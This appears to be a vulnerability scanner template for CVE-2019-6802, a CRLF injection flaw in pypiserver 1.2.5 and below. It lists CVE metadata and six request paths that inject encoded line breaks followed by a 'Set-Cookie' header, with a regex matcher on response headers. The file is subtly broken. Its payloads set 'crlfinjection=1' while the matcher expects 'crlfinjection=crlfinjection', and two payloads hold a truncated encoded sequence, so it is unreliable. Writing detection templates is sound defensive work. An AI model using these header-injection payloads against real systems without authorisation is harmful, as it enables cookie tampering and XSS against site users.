id: CVE-2019-6802-49
info:
  author: 0x_Akoko
  classification:
    cve-id: CVE-2019-6802
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-93
  description: CRLF Injection in pypiserver 1.2.5 and below allows attackers to set
    arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
  name: CRLF Injection in pypiserver 1.2.5
  reference:
  - https://vuldb.com/?id.130257
  - https://www.cvedetails.com/cve/CVE-2019-6802/
  severity: medium
  tags: cve,cve2019,crlf,generic,pypiserver
requests:
- matchers:
  - part: header
    regex:
    - (?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)
    type: regex
  method: GET
  path:
  - '{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;'
  - '{{BaseURL}}%0d%0aSet-Cookie:crlfinjection=1;'
  - '{{BaseURL}}/%0aSet-Cookie:crlfinjection=1;'
  - '{{BaseURL}}%0aSet-Cookie:crlfinjection=1;'
  - '{{BaseURL}}%E5%98%8D%E5%98%8Set-Cookie:crlfinjection=1;'
  - '{{BaseURL}}/%E5%98%8D%E5%98%8Set-Cookie:crlfinjection=1;'
